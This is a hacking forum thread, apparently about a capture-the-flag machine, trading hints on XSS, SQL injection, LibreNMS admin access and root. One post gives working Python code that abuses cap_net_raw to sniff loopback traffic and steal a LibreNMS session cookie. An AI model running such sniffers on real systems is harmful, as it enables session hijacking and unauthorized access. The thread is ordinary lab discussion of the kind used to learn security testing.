Posts: 22
Threads: 5
Joined: Mar 2024
Mar 11, 2024, 06:16 AM
(This post was last modified: Mar 11, 2024, 06:19 AM by dolare141.)
(Mar 10, 2024, 11:46 PM)sus11 Wrote: The chatbot is a rabbit hole; Contact.html is the real path, try all fields until you get your XSS
can you help with the xss?
[/quote]
Here is the walkthrough video : https://youtu.be/e4g3_cNU6do
(Mar 10, 2024, 08:43 PM)geoblitz Wrote: Any help with root?
Here is the walkthrough video if you still need help: https://youtu.be/e4g3_cNU6do
(Mar 10, 2024, 01:56 PM)Th35t0rm Wrote: same here , any hint for becoming admin
found a sqli but cant dump the db , only current_user , hostname and dbs works
https://huntr.com/bounties/54813d42-5b93...9d2cbf090/
Still stuck? Watch the video here: https://youtu.be/e4g3_cNU6do
Posts: 6
Threads: 0
Joined: Feb 2024
(Mar 11, 2024, 06:16 AM)dolare141 Wrote: (Mar 10, 2024, 11:46 PM)sus11 Wrote: The chatbot is a rabbit hole; Contact.html is the real path, try all fields until you get your XSS
can you help with the xss?
Here is the walkthrough video : https://youtu.be/e4g3_cNU6do
(Mar 10, 2024, 08:43 PM)geoblitz Wrote: Any help with root?
Here is the walkthrough video if you still need help: https://youtu.be/e4g3_cNU6do
(Mar 10, 2024, 01:56 PM)Th35t0rm Wrote: same here , any hint for becoming admin
found a sqli but cant dump the db , only current_user , hostname and dbs works
https://huntr.com/bounties/54813d42-5b93...9d2cbf090/
Still stuck? Watch the video here: https://youtu.be/e4g3_cNU6do
[/quote]
ty for the help
Posts: 47
Threads: 4
Joined: Nov 2023
Mar 13, 2024, 01:34 AM
(This post was last modified: Mar 13, 2024, 01:34 AM by jahman.)
Here is my method to get librenms from www-data.
/usr/bin/python3.10 has the cap_net_raw capabilities so you can sniff raw socket.
Just download on your local box the pcap and dpkt pip package, make an archive and upload it to the box next in the same directory of the followging code.
It will dump the tcp 3000 port traffic and You can get the cookie to login to the librenms web interface
import pcap
import dpkt
def decode_udp(packet):
eth = dpkt.ethernet.Ethernet(packet)
if not isinstance(eth.data, dpkt.ip.IP):
return None
ip = eth.data
if not isinstance(ip.data, dpkt.tcp.TCP):
return None
tcp = ip.data
if tcp.dport == 3000:
return tcp.data
def main():
interface = 'lo' # Change to your interface
pc = pcap.pcap(name=interface, promisc=True, immediate=True)
for timestamp, packet in pc:
data = decode_udp(packet)
if data:
print("Received TCP packet on port 80:")
print(data.decode('utf-8', 'ignore'))
if __name__ == "__main__":
main()
Posts: 40
Threads: 2
Joined: Oct 2023
thanks for sharing the tips :-)
Posts: 24
Threads: 1
Joined: Aug 2023
(Mar 11, 2024, 06:16 AM)dolare141 Wrote: (Mar 10, 2024, 11:46 PM)sus11 Wrote: The chatbot is a rabbit hole; Contact.html is the real path, try all fields until you get your XSS
can you help with the xss?
Here is the walkthrough video : https://youtu.be/e4g3_cNU6do
(Mar 10, 2024, 08:43 PM)geoblitz Wrote: Any help with root?
Here is the walkthrough video if you still need help: https://youtu.be/e4g3_cNU6do
(Mar 10, 2024, 01:56 PM)Th35t0rm Wrote: same here , any hint for becoming admin
found a sqli but cant dump the db , only current_user , hostname and dbs works
https://huntr.com/bounties/54813d42-5b93...9d2cbf090/
Still stuck? Watch the video here: https://youtu.be/e4g3_cNU6do
[/quote]
after got message connected but does need setting the netcat to listen or something to move to root
Posts: 16
Threads: 0
Joined: Sep 2023
how can i become admin on librenms? I tried CVE-2023-5591 but i can't make it work...
Posts: 2
Threads: 0
Joined: Jan 2024
rooted.
Insane for me but rooted at all.
PM for hints
|
